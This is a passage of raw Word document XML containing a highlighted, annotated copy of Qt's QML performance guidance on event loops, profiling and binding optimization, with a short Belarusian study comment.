            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QEventLoop</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or calling</w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId615" w:anchor="processEvents" w:history="1">
        <w:r w:rsidRPr="00615FAD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QCoreApplication::processEvents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() in order to avoid blocking within a C++ code block invoked from QML. This is dangerous, because when an event loop is entered in a signal handler or binding, the QML engine continues to run other bindings, animations, transitions, etc. Those bindings can then cause side effects which, for example, destroy the hierarchy containing your event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F1E57" w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu</w:t>
      </w:r>
      <w:r w:rsidR="001F1E57" w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F1E57" w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="001F1E57" w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F1E57" w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>problem</w:t>
      </w:r>
      <w:r w:rsidR="001F1E57" w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F1E57" w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="001F1E57" w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F1E57" w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidR="001F1E57" w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> // як я разумею, гэта хак для таго, каб не заміраў інтэрфэйс пры С++ разліках. Але я трошачку не вельмі ўцяміў гэты механізм з выкарыстаннем дадзенага класа цыкла падзей //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00615FAD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="864" w:name="profiling"/>
      <w:bookmarkStart w:id="865" w:name="_Toc483000713"/>
      <w:bookmarkStart w:id="866" w:name="_Toc483003730"/>
      <w:bookmarkStart w:id="867" w:name="_Toc483604065"/>
      <w:bookmarkStart w:id="868" w:name="_Toc483605285"/>
      <w:bookmarkEnd w:id="864"/>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Profiling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="865"/>
      <w:bookmarkEnd w:id="866"/>
      <w:bookmarkEnd w:id="867"/>
      <w:bookmarkEnd w:id="868"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>most important tip is</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">use the QML </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>profiler</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>included with Qt Creator</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Knowing where time is spent</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in an application will allow you to focus on problem areas which </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>actually exist</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, rather than problem areas which </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>potentially exist</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the Qt Creator manual for more information on how to use the QML profiling tool.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Determining which </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bindings are being run the most often</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or which functions your application is spending the most time in</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, will allow you to decide whether you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>optimize</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the problem areas, or </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redesign</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> some implementation details of your application so that the performance is improved. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attempting to optimize code without profiling is likely to result in very minor rather than significant performance improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00615FAD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="869" w:name="_Toc483000714"/>
      <w:bookmarkStart w:id="870" w:name="_Toc483003731"/>
      <w:bookmarkStart w:id="871" w:name="_Toc483604066"/>
      <w:bookmarkStart w:id="872" w:name="_Toc483605286"/>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="869"/>
      <w:bookmarkEnd w:id="870"/>
      <w:bookmarkEnd w:id="871"/>
      <w:bookmarkEnd w:id="872"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="001F1E57" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Most QML applications</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> will have a </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>large amount of JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> code in them, in the form of dynamic functions, signal handlers, and property binding expressions. This is generally not a problem. Thanks to </w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>some optimizations in the QML engine</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as those done to the bindings compiler, it </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in some use-cases) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be faster than calling a C++ function</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>However, care must be taken to ensure that unnecessary processing isn't triggered accidentally</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00615FAD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="873" w:name="bindings"/>
      <w:bookmarkStart w:id="874" w:name="_Toc483000715"/>
      <w:bookmarkStart w:id="875" w:name="_Toc483003732"/>
      <w:bookmarkStart w:id="876" w:name="_Toc483604067"/>
      <w:bookmarkStart w:id="877" w:name="_Toc483605287"/>
      <w:bookmarkEnd w:id="873"/>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bindings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="874"/>
      <w:bookmarkEnd w:id="875"/>
      <w:bookmarkEnd w:id="876"/>
      <w:bookmarkEnd w:id="877"/>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There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two types</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of bindings in QML: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>optimized</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>non-optimized bindings</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>good idea to keep binding expressions as simple as possible</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, since the QML engine makes use of an </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>optimized binding expression evaluator</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which can evaluate simple binding expressions without needing to switch into a full JavaScript execution environment. These optimized bindings are evaluated far more efficiently than </w:t>
      </w:r>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>more complex (non-optimized) bindings</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>basic requirement for optimization of bindings is that the type information of every symbol accessed must be known at compile time.</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4021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Things to avoid</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in binding expressions to maximize optimizability:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">declaring </w:t>
      </w:r>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>intermediate JavaScript variables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="004021B8" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>accessing "var" properties</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="004021B8" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
